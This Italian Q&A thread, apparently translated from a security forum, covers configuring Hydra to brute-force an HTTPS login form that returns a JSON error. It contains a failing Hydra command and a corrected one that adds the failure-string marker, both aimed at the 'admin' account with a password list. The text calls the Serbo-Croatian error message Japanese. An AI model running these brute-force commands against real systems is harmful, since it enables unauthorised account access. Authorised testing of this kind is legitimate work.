Come eseguire Hydra con la risposta JSON?

Naviga le tue risposte
3

Ho fatto qualche caccia alle taglie e ho avuto problemi con l'hydra. Quindi c'è un modulo di login https, la richiesta è: 

https://bbsite/crp/login?password=pass&username=admin

Il problema è che la risposta è in giapponese. Quindi per l'accesso errato è: 

{"success":false,"greska":"Pogre\u0161no."}

Quindi la mia soluzione era: 

hydra  bbsite https-get-form "/crp/login:username=^USER^&password=^PASS^:{\"success\"\:false,\"greska\"\:\"Pogre\u0161no\"}" -l admin -P /root/Downloads/pass.txt

Ma questo non funziona, e non ho idea del perché. Qualcuno può suggerire una soluzione?

    
posta Daniel Max 22.03.2016 - 17:01
fonte

1 risposta

2

Soluzione trovata: 

hydra  bbsite https-get-form "/crp/login:username=^USER^&password=^PASS^:F={\"success\"\:false,\"greska\"\:\"Pogre\\u0161no\"}" -l admin -P /root/Downloads/pass.txt

Necessario aggiungere F = per il login fallito. Necessario per uscire \ con \.

    
risposta data 22.03.2016 - 17:09
fonte

Leggi altre domande sui tag

Come verificare una firma di un'entità da un'altra utilizzando la CLI di OpenSSL? Come velocizzare l'handshake TLS lento su ESP8266 con TLS mbed?